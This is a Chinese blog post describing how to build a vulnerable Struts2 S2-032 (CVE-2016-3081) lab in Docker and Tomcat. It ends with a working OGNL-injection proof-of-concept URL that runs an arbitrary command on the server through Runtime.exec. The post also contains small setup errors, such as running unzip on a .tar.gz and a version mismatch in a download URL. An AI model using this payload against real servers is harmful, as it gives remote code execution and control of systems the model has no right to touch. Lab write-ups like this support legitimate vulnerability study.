美文网首页
利用docker搭建struts2-032漏洞

利用docker搭建struts2-032漏洞

作者: 二潘 | 来源:发表于2018-09-05 16:59 被阅读38次

漏洞的信息

CVE编号:CVE-2016-3081
漏洞名称:Struts2 S2 – 032远程代码执行
漏洞发布日期:2016.4.15
受影响的软件及系统:Struts2版本:Struts2 2.0.0 -2.3.28( 2.2.3(2.3.20.2和2.3.42.2不受影响)

漏洞概述

Apache Struts 2是世界上最流行的Java Web服务器框架之一。然而近日国内安全企业安恒信息的安全研究员Nike.zheng在Struts 2上发现存在高危安全漏洞(CVE-2016-3081,S02-32),黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,该漏洞广泛影响所有struts版本。

漏洞分析

此次漏洞存在于struts2的动态方法引用功能。只要在struts2配置文件中开启该功能,就可能被利用。

<constant name=”struts.enable.DynamicMethodInvocation” value=”true” />

如果我们请求http://localhost/index.action?method:OGNL的情况下,请求的OGNL表达式会被执行,造成命令执行。
想了解漏洞详细的分析,天融信阿尔法实验室

漏洞的利用

0x01 直接使用上次制好的镜像tomcat,生成容器:

docker run -it -d --name struts2-032 -p 8088:8080 tomcat

注意点就是Tomcat的默认端口为8080,因而端口要映射到8080。


image.png

当然如果没有容器,可以创建一个
命令是搜索可用的docker镜像

docker search apahce-tomcat
image.png

通过docker ps -a即可查看是否已启动


image.png

进入容器:

docker exec -t -i 00fb77cb413a /bin/bash
image.png

更新源:

apt-get install
image.png

安装jdk

先查看是否已安装jdk:

java -version
image.png

如图有安装,如果没有则接着直接安装默认jdk即可:

apt-get install default-jdk

接着查看并配置java环境变量:


image.png

确认已配置好。

安装tomcat

容器里面默认有tomcat安装包,我们就不需要从外面下载进来了,如果没有可以通过wget命令下载Tomcat的安装包

wget http://mirror.bit.edu.cn/apache/tomcat/tomcat-7/v7.0.79/bin/apache-tomcat-7.0.90.tar.gz

接着解压:

unzip  apache-tomcat-7.0.90.tar.gz

开启Apache:


image.png

访问查看是否已开启:

可以通过curl命令本机查看一下:


image.png

当然直接到物理机的浏览器访问相应映射的端口访问也可以:
http://192.168.10.110:8088


image.png

若出现如上图则安装成功。

下载/struts/2.3.24

下载地址http://archive.apache.org/dist/struts/2.3.24/

百度云链接http://pan.baidu.com/s/1dFeUyNv
密码:279t

下载到本地,复制到虚拟机里面,然后cp到docker中
docker cp 本地的路径 容器ID : 容器里的路径

docker cp /home/ttf/struts-2.3.24 00fb77cb413a:/usr/local/tomcat/bin
image.png

然后将struts-2.3.24目录中apps目录内的struts2-showcase.war文件复制到Tomcat/webapps目录中的ROOT.war即可:

cp struts-2.3.24/apps/struts2-showcase.war /usr/local/tomcat/webapps/ROOT.war

image.png

接着重启Tomcat:

root@00fb77cb413a:/usr/local/tomcat/bin# ./shutdown.sh
root@00fb77cb413a:/usr/local/tomcat/bin# ./startup.sh

编写PoC验证:

?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami

原网址

http://192.168.10.110:8088//struts2-showcase/home.action

现在网址

http://192.168.10.110:8088/struts2-showcase/home.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=whoami
image.png

只是手工验证了一下,还有其他的脚本或者批量的方式进行验证,遇到可以成功利用的脚本会贴到这里,待续~

相关文章

网友评论

      本文标题:利用docker搭建struts2-032漏洞

      本文链接:https://www.haomeiwen.com/subject/yiiawftx.html